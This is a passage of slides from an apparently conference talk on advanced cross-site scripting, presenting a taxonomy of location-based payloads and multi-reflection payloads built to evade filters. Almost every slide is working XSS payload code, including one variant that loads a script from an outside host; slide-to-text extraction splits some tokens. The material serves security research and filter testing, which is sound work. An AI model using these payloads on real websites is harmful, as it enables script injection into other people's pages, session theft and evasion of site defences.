    Location Based Payloads- Evolution 1 <svg onload=location='javascript:alert(1)'> <svg onload=location=location.hash.substr(1)>#javascript:alert(1) <svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/. source+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/. source+location.hash[1]+1+location.hash[2]>#()
  • 41.
    Location Based Payloads- Evolution 2 <javascript onclick=alert(tagName)>click me! <javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So... <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) javascript + :"click me! + #"-alert(1) javascrip + t:"click me! + #"-alert(1) javas + cript:"click me! + #"-alert(1)
  • 42.
    Location Based Payloads- Taxonomy ● By Type 1. Location 2. Location Self 3. Location Self Plus ● By Positioning (Properties) Before < Itself > After # Hash Inside
  • 43.
    Location Based Payloads- Location ● Location After (innerHTML) <j onclick=location=innerHTML>javascript&colon;alert(1)// ● Location Inside (name+id) <svg id=t:alert(1) name=javascrip onload=location=name+id>
  • 44.
    Location Based Payloads- Location ● Location Itself + After + Hash (tagName+innerHTML+location.hash) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'- alert(1) <javascript onclick=location=tagName+innerHTML+URL>:"-'click me! </javascript>#'-alert(1) Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)
  • 45.
    Location Based Payloads- Location ● Location Itself + Hash (tagName+URL) <javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1) (“Labeled Jump”) <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1) Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#% 0Aalert(1)
  • 46.
    Location Based Payloads- Location ● Location After + Hash (innerHTML+URL) <j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1) <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
  • 47.
    Location Based Payloads- Location ● Location Itself + After + Hash (tagName+innerHTML+URL) <javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'- alert(1) <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
  • 48.
    Location Based Payloads- Location ● Location Itself + Before (tagName+previousSibling) "-alert(9)<javascript:" onclick=location=tagName+previousSibling. nodeValue>click me! ● Location Itself + After + Before (tagName+innerHTML+previousSibling) '-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling. nodeValue>cript:'click me!
  • 49.
    Location Based Payloads- Location ● Location After + Itself (innerHTML+outerHTML) <alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me! */</alert(1)<!-- --> javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- --> <j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript: /*click me! javascript:/*click me! + <j 1="*/""-alert(1)<!-- …
  • 50.
    Location Based Payloads- Location ● Location After + Before + Itself (innerHTML+previousSibling+outerHTML) */"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j"-alert(9)<!-- ... */"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j 1="-alert(9)//" ...
  • 51.
    Location Based Payloads- Location Self ● Location Self Inside p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id> http://...?p=<svg/onload=alert(1)+ p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id> http://...?p=<script/src=//brutelogic.com.br/1+
  • 52.
    Location Based Payloads- Location Self ● Location Self After p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)> http://...?p=<svg/onload=alert(1)>
  • 53.
    Location Based Payloads- Location Self Plus ● Location Self Plus Itself p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me! http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location% 2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=" location+=outerHTML">
  • 54.
    Location Based Payloads- Location Self Plus ● Location Self Plus After p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)> http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt; svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
  • 55.
    Location Based Payloads- Location Self Plus ● Location Self Plus Before p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body. textContent>click me! http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location% 2B=document.body.textContent%3Eclick%20me![BODY_CONTENT] &p=<svg/onload=alert(1)>click me!
  • 56.
  • 57.
    Multi Reflection -Single Input ● Double Reflection - Single Input p='onload=alert(1)><svg/1=' 'onload=alert(1)><svg/1=' … [code] … 'onload=alert(1)><svg/1=' ● Double Reflection - Single Input (script) p=’>alert(1)</script><script/1=’ p=*/alert(1)</script><script>/* */alert(1)</script><script>/* … [code] … */alert(1)</script><script>/*
  • 58.
    Multi Reflection -Single Input ● Triple Reflection - Single Input p=*/alert(1)">'onload="/*<svg/1=' p=`-alert(1)">'onload="`<svg/1=' `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' ● Triple Reflection - Single Input (script) p=*/</script>'>alert(1)/*<script/1=' */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1='
  • 59.
    Multi Reflection -Multi Input ● 2 inputs: p=<svg/1='&q='onload=alert(1)> ● 3 inputs: p=<svg 1='&q=onload='/*&r=*/alert(1)'>
  • 60.
    Conclusion ● XSS vectorscan: - be complex; - easily evade filters; - blow your mind.
  • 61.